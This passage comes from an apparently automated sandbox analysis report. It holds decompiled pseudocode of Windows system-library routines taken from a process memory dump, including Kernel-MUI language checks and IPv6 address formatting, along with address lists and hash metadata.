                                                                                                                                                                                                              						 *_v12 = 0;
                                                                                                                                                                                                              						E0085E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                                                              						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              							_a4 = _a4 + 1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v16 = _v12;
                                                                                                                                                                                                              						_t288 = E0086E679(_v12, _t332);
                                                                                                                                                                                                              						_pop(_t322);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t296 = _v16;
                                                                                                                                                                                                              					if( *_v16 != _t318) {
                                                                                                                                                                                                              						E0085E2A8(_t322,  &_v68, _t296);
                                                                                                                                                                                                              						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                                                              							_a4 = _a4 + 1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_a4 == _t318) {
                                                                                                                                                                                                              						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                                                                              						_v48 = _t318;
                                                                                                                                                                                                              						_v28 = _t318;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v8 != _t318) {
                                                                                                                                                                                                              						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_v8 = _t318;
                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}





































                                                                                                                                                                                                              0x00878788
                                                                                                                                                                                                              0x00878788
                                                                                                                                                                                                              0x00878791
                                                                                                                                                                                                              0x00878794
                                                                                                                                                                                                              0x00878798
                                                                                                                                                                                                              0x0087879b
                                                                                                                                                                                                              0x0087879e
                                                                                                                                                                                                              0x008787a1
                                                                                                                                                                                                              0x008787a4
                                                                                                                                                                                                              0x008787a7
                                                                                                                                                                                                              0x008787aa
                                                                                                                                                                                                              0x008787af
                                                                                                                                                                                                              0x008c1ad3
                                                                                                                                                                                                              0x00878b0a
                                                                                                                                                                                                              0x00878b0d
                                                                                                                                                                                                              0x00878b13
                                                                                                                                                                                                              0x00878b19
                                                                                                                                                                                                              0x00878b1f
                                                                                                                                                                                                              0x00878b25
                                                                                                                                                                                                              0x00878b2b
                                                                                                                                                                                                              0x00878b31
                                                                                                                                                                                                              0x00878b37
                                                                                                                                                                                                              0x00878b3d
                                                                                                                                                                                                              0x00878b46
                                                                                                                                                                                                              0x00878b46
                                                                                                                                                                                                              0x008787c6
                                                                                                                                                                                                              0x008787d0
                                                                                                                                                                                                              0x008c1ae0
                                                                                                                                                                                                              0x008c1ae6
                                                                                                                                                                                                              0x008c1af8
                                                                                                                                                                                                              0x008c1af8
                                                                                                                                                                                                              0x008c1afd
                                                                                                                                                                                                              0x008c1afe
                                                                                                                                                                                                              0x008c1b01
                                                                                                                                                                                                              0x008c1b06
                                                                                                                                                                                                              0x008c1b06
                                                                                                                                                                                                              0x008787d6
                                                                                                                                                                                                              0x008787f2
                                                                                                                                                                                                              0x008787f7
                                                                                                                                                                                                              0x00878807
                                                                                                                                                                                                              0x0087880a
                                                                                                                                                                                                              0x0087880f
                                                                                                                                                                                                              0x00878810
                                                                                                                                                                                                              0x00878813
                                                                                                                                                                                                              0x00878818
                                                                                                                                                                                                              0x00878818
                                                                                                                                                                                                              0x0087882c
                                                                                                                                                                                                              0x00878831
                                                                                                                                                                                                              0x00878838
                                                                                                                                                                                                              0x00878908
                                                                                                                                                                                                              0x00878920
                                                                                                                                                                                                              0x008789f0
                                                                                                                                                                                                              0x00878a08
                                                                                                                                                                                                              0x00878af6
                                                                                                                                                                                                              0x00878af6
                                                                                                                                                                                                              0x00878af8
                                                                                                                                                                                                              0x00878afb
                                                                                                                                                                                                              0x008c1beb
                                                                                                                                                                                                              0x008c1beb
                                                                                                                                                                                                              0x00878b04
                                                                                                                                                                                                              0x008c1bf8
                                                                                                                                                                                                              0x008c1c0e
                                                                                                                                                                                                              0x008c1c13
                                                                                                                                                                                                              0x008c1c16
                                                                                                                                                                                                              0x008c1c16
                                                                                                                                                                                                              0x008c1bf8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00878b04
                                                                                                                                                                                                              0x00878a0e
                                                                                                                                                                                                              0x00878a11
                                                                                                                                                                                                              0x00878a14
                                                                                                                                                                                                              0x00878a15
                                                                                                                                                                                                              0x00878a18
                                                                                                                                                                                                              0x00878a22
                                                                                                                                                                                                              0x00878b59
                                                                                                                                                                                                              0x00878a28
                                                                                                                                                                                                              0x00878a3c
                                                                                                                                                                                                              0x00878a3c
                                                                                                                                                                                                              0x00878a42
                                                                                                                                                                                                              0x008c1bb0
                                                                                                                                                                                                              0x008c1b11
                                                                                                                                                                                                              0x008c1b11
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00878a48
                                                                                                                                                                                                              0x00878a51
                                                                                                                                                                                                              0x00878a5b
                                                                                                                                                                                                              0x00878a5e
                                                                                                                                                                                                              0x00878a61
                                                                                                                                                                                                              0x00878a69
                                                                                                                                                                                                              0x00878a69
                                                                                                                                                                                                              0x00878a6d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00878a74
                                                                                                                                                                                                              0x00878a7c
                                                                                                                                                                                                              0x00878a7d
                                                                                                                                                                                                              0x00878a91
                                                                                                                                                                                                              0x00878a93
                                                                                                                                                                                                              0x00878a93
                                                                                                                                                                                                              0x00878a98
                                                                                                                                                                                                              0x00878a9b
                                                                                                                                                                                                              0x00878aa1
                                                                                                                                                                                                              0x00878aa1
                                                                                                                                                                                                              0x00878aa4
                                                                                                                                                                                                              0x00878aaa
                                                                                                                                                                                                              0x00878ab1
                                                                                                                                                                                                              0x00878ac5
                                                                                                                                                                                                              0x00878ac7
                                                                                                                                                                                                              0x00878ac7
                                                                                                                                                                                                              0x00878ac5
                                                                                                                                                                                                              0x00878ace
                                                                                                                                                                                                              0x008c1bc9
                                                                                                                                                                                                              0x008c1bce
                                                                                                                                                                                                              0x008c1bd2
                                                                                                                                                                                                              0x008c1bd2
                                                                                                                                                                                                              0x00878ad8
                                                                                                                                                                                                              0x00878aeb
                                                                                                                                                                                                              0x00878aeb
                                                                                                                                                                                                              0x00878af0
                                                                                                                                                                                                              0x00878af4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00878af4
                                                                                                                                                                                                              0x00878a42
                                                                                                                                                                                                              0x00878926
                                                                                                                                                                                                              0x00878929
                                                                                                                                                                                                              0x0087892c
                                                                                                                                                                                                              0x0087892d
                                                                                                                                                                                                              0x00878930
                                                                                                                                                                                                              0x00878935
                                                                                                                                                                                                              0x0087893a
                                                                                                                                                                                                              0x00878b51
                                                                                                                                                                                                              0x00878940
                                                                                                                                                                                                              0x00878954
                                                                                                                                                                                                              0x00878954
                                                                                                                                                                                                              0x0087895a
                                                                                                                                                                                                              0x008c1b63
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00878960
                                                                                                                                                                                                              0x00878969
                                                                                                                                                                                                              0x00878973
                                                                                                                                                                                                              0x00878976
                                                                                                                                                                                                              0x00878979
                                                                                                                                                                                                              0x0087897e
                                                                                                                                                                                                              0x00878981
                                                                                                                                                                                                              0x00878981
                                                                                                                                                                                                              0x00878986
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008c1b6e
                                                                                                                                                                                                              0x008c1b74
                                                                                                                                                                                                              0x008c1b7b
                                                                                                                                                                                                              0x008c1b8f
                                                                                                                                                                                                              0x008c1b91
                                                                                                                                                                                                              0x008c1b91
                                                                                                                                                                                                              0x008c1b99
                                                                                                                                                                                                              0x008c1b9c
                                                                                                                                                                                                              0x008c1ba2
                                                                                                                                                                                                              0x008c1ba2
                                                                                                                                                                                                              0x0087898c
                                                                                                                                                                                                              0x00878992
                                                                                                                                                                                                              0x00878999
                                                                                                                                                                                                              0x008789ad
                                                                                                                                                                                                              0x008c1ba8
                                                                                                                                                                                                              0x008c1ba8
                                                                                                                                                                                                              0x008789ad
                                                                                                                                                                                                              0x008789b6
                                                                                                                                                                                                              0x008789c8
                                                                                                                                                                                                              0x008789cd
                                                                                                                                                                                                              0x008789d0
                                                                                                                                                                                                              0x008789d0
                                                                                                                                                                                                              0x008789d6
                                                                                                                                                                                                              0x008789e8
                                                                                                                                                                                                              0x008789e8
                                                                                                                                                                                                              0x008789ed
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008789ed
                                                                                                                                                                                                              0x0087895a
                                                                                                                                                                                                              0x0087883e
                                                                                                                                                                                                              0x00878841
                                                                                                                                                                                                              0x00878844
                                                                                                                                                                                                              0x00878845
                                                                                                                                                                                                              0x00878848
                                                                                                                                                                                                              0x0087884d
                                                                                                                                                                                                              0x00878852
                                                                                                                                                                                                              0x00878b49
                                                                                                                                                                                                              0x00878858
                                                                                                                                                                                                              0x0087886c
                                                                                                                                                                                                              0x0087886c
                                                                                                                                                                                                              0x00878872
                                                                                                                                                                                                              0x008c1b0e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00878878
                                                                                                                                                                                                              0x00878881
                                                                                                                                                                                                              0x0087888b
                                                                                                                                                                                                              0x0087888e
                                                                                                                                                                                                              0x00878891
                                                                                                                                                                                                              0x00878896
                                                                                                                                                                                                              0x00878899
                                                                                                                                                                                                              0x00878899
                                                                                                                                                                                                              0x0087889e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008c1b21
                                                                                                                                                                                                              0x008c1b27
                                                                                                                                                                                                              0x008c1b2e
                                                                                                                                                                                                              0x008c1b42
                                                                                                                                                                                                              0x008c1b44
                                                                                                                                                                                                              0x008c1b44
                                                                                                                                                                                                              0x008c1b4c
                                                                                                                                                                                                              0x008c1b4f
                                                                                                                                                                                                              0x008c1b55
                                                                                                                                                                                                              0x008c1b55
                                                                                                                                                                                                              0x008788a4
                                                                                                                                                                                                              0x008788aa
                                                                                                                                                                                                              0x008788b1
                                                                                                                                                                                                              0x008788c5
                                                                                                                                                                                                              0x008c1b5b
                                                                                                                                                                                                              0x008c1b5b
                                                                                                                                                                                                              0x008788c5
                                                                                                                                                                                                              0x008788ce
                                                                                                                                                                                                              0x008788e0
                                                                                                                                                                                                              0x008788e5
                                                                                                                                                                                                              0x008788e8
                                                                                                                                                                                                              0x008788e8
                                                                                                                                                                                                              0x008788ee
                                                                                                                                                                                                              0x00878900
                                                                                                                                                                                                              0x00878900
                                                                                                                                                                                                              0x00878905
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00878905

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 008789FC
                                                                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 008787E6
                                                                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00878827
                                                                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00878914
                                                                                                                                                                                                              • WindowsExcludedProcs, xrefs: 008787C1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcspbrk
                                                                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                              • API String ID: 402402107-258546922
                                                                                                                                                                                                              • Opcode ID: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
                                                                                                                                                                                                              • Instruction ID: 1c6edd887fdcd274270d59fabc44af375c0b1263074298959232ef17e080710c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F1E4B2D00209EFCF15DF98C985AAEBBB9FB08304F14846AE505E7251EB34DA45DB61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                                                                              			E008913CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                                                                              				signed int _t78;
                                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                                              				char _t90;
                                                                                                                                                                                                              				signed int _t91;
                                                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                                              				signed int _t114;
                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                              				intOrPtr _t128;
                                                                                                                                                                                                              				intOrPtr* _t129;
                                                                                                                                                                                                              				void* _t130;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t129 = _a4;
                                                                                                                                                                                                              				_t128 = _a8;
                                                                                                                                                                                                              				_t116 = 0;
                                                                                                                                                                                                              				_t71 = _t128 + 0x5c;
                                                                                                                                                                                                              				_v8 = 8;
                                                                                                                                                                                                              				_v20 = _t71;
                                                                                                                                                                                                              				if( *_t129 == 0) {
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                                                              						if(_t96 != 0) {
                                                                                                                                                                                                              							L38:
                                                                                                                                                                                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                              								_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                              								L36:
                                                                                                                                                                                                              								return _t128 + _t86 * 2;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                                                              						if(_t114 == 0) {
                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                              							_t115 = 0x852926;
                                                                                                                                                                                                              							L35:
                                                                                                                                                                                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                              							_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t114 != 0xffff) {
                                                                                                                                                                                                              							_t116 = 0;
                                                                                                                                                                                                              							goto L38;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t114 != 0) {
                                                                                                                                                                                                              							_t115 = 0x859cac;
                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L33;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                              					_a8 = _t116;
                                                                                                                                                                                                              					_a4 = _t116;
                                                                                                                                                                                                              					_v12 = _t116;
                                                                                                                                                                                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                                                              							_v8 = 6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t90 = _v8;
                                                                                                                                                                                                              					if(_t90 <= _t116) {
                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                              						if(_a8 - _a4 <= 1) {
                                                                                                                                                                                                              							_a8 = _t116;
                                                                                                                                                                                                              							_a4 = _t116;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t91 = 0;
                                                                                                                                                                                                              						if(_v8 <= _t116) {
                                                                                                                                                                                                              							L22:
                                                                                                                                                                                                              							if(_v8 < 8) {
                                                                                                                                                                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                              								_t128 = _t128 + E00887707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							return _t128;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                                                              								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                                                              									_push(":");
                                                                                                                                                                                                              									_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                              									_push(_t128);
                                                                                                                                                                                                              									_t128 = _t128 + E00887707() * 2;
                                                                                                                                                                                                              									_t71 = _v20;
                                                                                                                                                                                                              									_t130 = _t130 + 0xc;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t78 = E00887707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                                                              								_t130 = _t130 + 0x10;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_push(L"::");
                                                                                                                                                                                                              								_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                              								_push(_t128);
                                                                                                                                                                                                              								_t78 = E00887707();
                                                                                                                                                                                                              								_t130 = _t130 + 0xc;
                                                                                                                                                                                                              								_t91 = _a8 - 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t91 = _t91 + 1;
                                                                                                                                                                                                              							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                                                              							_t71 = _v20;
                                                                                                                                                                                                              							if(_t91 >= _v8) {
                                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t116 = 0;
                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t108 = 1;
                                                                                                                                                                                                              						_v16 = _t129;
                                                                                                                                                                                                              						_v24 = _t90;
                                                                                                                                                                                                              						do {
                                                                                                                                                                                                              							if( *_v16 == _t116) {
                                                                                                                                                                                                              								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                                                                              									_a4 = _v12;
                                                                                                                                                                                                              									_a8 = _t108;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t116 = 0;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v12 = _t108;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v16 = _v16 + 2;
                                                                                                                                                                                                              							_t108 = _t108 + 1;
                                                                                                                                                                                                              							_t26 =  &_v24;
                                                                                                                                                                                                              							 *_t26 = _v24 - 1;
                                                                                                                                                                                                              						} while ( *_t26 != 0);
                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}




















                                                                                                                                                                                                              0x008913d5
                                                                                                                                                                                                              0x008913d9
                                                                                                                                                                                                              0x008913dc
                                                                                                                                                                                                              0x008913de
                                                                                                                                                                                                              0x008913e1
                                                                                                                                                                                                              0x008913e8
                                                                                                                                                                                                              0x008913ee
                                                                                                                                                                                                              0x008be8fd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008be921
                                                                                                                                                                                                              0x008be921
                                                                                                                                                                                                              0x008be928
                                                                                                                                                                                                              0x008be982
                                                                                                                                                                                                              0x008be98a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008be99a
                                                                                                                                                                                                              0x008be99e
                                                                                                                                                                                                              0x008be9a3
                                                                                                                                                                                                              0x008be9a8
                                                                                                                                                                                                              0x008be9b9
                                                                                                                                                                                                              0x008be978
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008be978
                                                                                                                                                                                                              0x008be98a
                                                                                                                                                                                                              0x008be92a
                                                                                                                                                                                                              0x008be931
                                                                                                                                                                                                              0x008be944
                                                                                                                                                                                                              0x008be944
                                                                                                                                                                                                              0x008be950
                                                                                                                                                                                                              0x008be954
                                                                                                                                                                                                              0x008be959
                                                                                                                                                                                                              0x008be95e
                                                                                                                                                                                                              0x008be963
                                                                                                                                                                                                              0x008be970
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008be975
                                                                                                                                                                                                              0x008be93b
                                                                                                                                                                                                              0x008be980
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008be980
                                                                                                                                                                                                              0x008be942
                                                                                                                                                                                                              0x008be94b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008be94b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008be942
                                                                                                                                                                                                              0x008913f4
                                                                                                                                                                                                              0x008913f4
                                                                                                                                                                                                              0x008913f9
                                                                                                                                                                                                              0x008913fc
                                                                                                                                                                                                              0x008913ff
                                                                                                                                                                                                              0x00891406
                                                                                                                                                                                                              0x008be9cc
                                                                                                                                                                                                              0x008be9d2
                                                                                                                                                                                                              0x008be9d2
                                                                                                                                                                                                              0x008be9cc
                                                                                                                                                                                                              0x0089140c
                                                                                                                                                                                                              0x00891411
                                                                                                                                                                                                              0x00891431
                                                                                                                                                                                                              0x0089143a
                                                                                                                                                                                                              0x0089143c
                                                                                                                                                                                                              0x0089143f
                                                                                                                                                                                                              0x0089143f
                                                                                                                                                                                                              0x00891442
                                                                                                                                                                                                              0x00891447
                                                                                                                                                                                                              0x008914a8
                                                                                                                                                                                                              0x008914ac
                                                                                                                                                                                                              0x008be9e2
                                                                                                                                                                                                              0x008be9e7
                                                                                                                                                                                                              0x008be9ec
                                                                                                                                                                                                              0x008bea05
                                                                                                                                                                                                              0x008bea05
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00891449
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00891449
                                                                                                                                                                                                              0x0089144c
                                                                                                                                                                                                              0x00891459
                                                                                                                                                                                                              0x00891462
                                                                                                                                                                                                              0x00891469
                                                                                                                                                                                                              0x0089146a
                                                                                                                                                                                                              0x00891470
                                                                                                                                                                                                              0x00891473
                                                                                                                                                                                                              0x00891476
                                                                                                                                                                                                              0x00891476
                                                                                                                                                                                                              0x00891490
                                                                                                                                                                                                              0x00891495
                                                                                                                                                                                                              0x0089138e
                                                                                                                                                                                                              0x00891390
                                                                                                                                                                                                              0x00891397
                                                                                                                                                                                                              0x00891398
                                                                                                                                                                                                              0x00891399
                                                                                                                                                                                                              0x008913a1
                                                                                                                                                                                                              0x008913a4
                                                                                                                                                                                                              0x008913a4
                                                                                                                                                                                                              0x00891498
                                                                                                                                                                                                              0x0089149c
                                                                                                                                                                                                              0x0089149f
                                                                                                                                                                                                              0x008914a2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008914a4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008914a4
                                                                                                                                                                                                              0x00891413
                                                                                                                                                                                                              0x00891415
                                                                                                                                                                                                              0x00891416
                                                                                                                                                                                                              0x00891419
                                                                                                                                                                                                              0x0089141c
                                                                                                                                                                                                              0x00891422
                                                                                                                                                                                                              0x008913b7
                                                                                                                                                                                                              0x008913bc
                                                                                                                                                                                                              0x008913bf
                                                                                                                                                                                                              0x008913bf
                                                                                                                                                                                                              0x008913c2
                                                                                                                                                                                                              0x00891424
                                                                                                                                                                                                              0x00891424
                                                                                                                                                                                                              0x00891424
                                                                                                                                                                                                              0x00891427
                                                                                                                                                                                                              0x0089142b
                                                                                                                                                                                                              0x0089142c
                                                                                                                                                                                                              0x0089142c
                                                                                                                                                                                                              0x0089142c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0089141c
                                                                                                                                                                                                              0x00891411

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                                                                              • Opcode ID: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
                                                                                                                                                                                                              • Instruction ID: a6fe69c3a6269f7ec4c6c29c1ca7d135ab1b205ff04bb15633e075aff73f63ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F612771908656AACF24EF5DC8848BEBBB6FF94301718C02DE4D6C7741D634AA44DB61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                                              			E00887EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				char _v540;
                                                                                                                                                                                                              				unsigned int _v544;
                                                                                                                                                                                                              				signed int _v548;
                                                                                                                                                                                                              				intOrPtr _v552;
                                                                                                                                                                                                              				char _v556;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                              				unsigned int _t46;
                                                                                                                                                                                                              				unsigned int _t47;
                                                                                                                                                                                                              				unsigned int _t52;
                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                              				unsigned int _t62;
                                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t33 =  *0x932088; // 0x774227ca
                                                                                                                                                                                                              				_v8 = _t33 ^ _t73;
                                                                                                                                                                                                              				_v548 = _v548 & 0x00000000;
                                                                                                                                                                                                              				_t72 = _a4;
                                                                                                                                                                                                              				if(E00887F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                                                              					__eflags = _v548;
                                                                                                                                                                                                              					if(_v548 == 0) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t62 = _t72 + 0x24;
